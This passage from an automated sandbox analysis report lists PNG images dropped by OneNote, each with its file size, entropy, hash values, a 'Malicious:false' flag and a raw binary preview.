                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
